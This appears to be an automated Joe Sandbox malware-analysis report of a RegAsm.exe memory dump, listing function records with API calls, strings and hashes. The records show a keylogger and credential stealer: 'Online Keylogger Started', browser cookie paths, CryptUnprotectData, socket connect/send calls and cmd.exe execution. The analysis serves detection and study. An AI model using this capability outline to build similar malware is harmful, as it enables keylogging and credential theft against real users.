                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                • _free.LIBCMT ref: 0044E8D5
                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                APIs
                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00AC4830,00000010), ref: 004048E0
                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                • String ID: XQG$NG$PG
                                                                • API String ID: 1634807452-3565412412
                                                                • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                • _free.LIBCMT ref: 10004CE8
                                                                • _free.LIBCMT ref: 10004CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                • _free.LIBCMT ref: 004435E0
                                                                • _free.LIBCMT ref: 004435EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A11986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                • API String ID: 368326130-3219657780
                                                                • Opcode ID: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                • Opcode Fuzzy Hash: f38496434feea30fe495744d679b1447ef1d4ad329803ceb635c4f7107d4ce0b
                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                APIs
                                                                • SystemParametersInfoW.USER32 ref: 0041CB68
                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00416330
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode$PG
                                                                • API String ID: 3411444782-3370592832
                                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                APIs
                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                Strings
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                APIs
                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                Strings
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeHandleLibraryModule
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 662261464-1276376045
                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 186401046-604454484
                                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                Strings
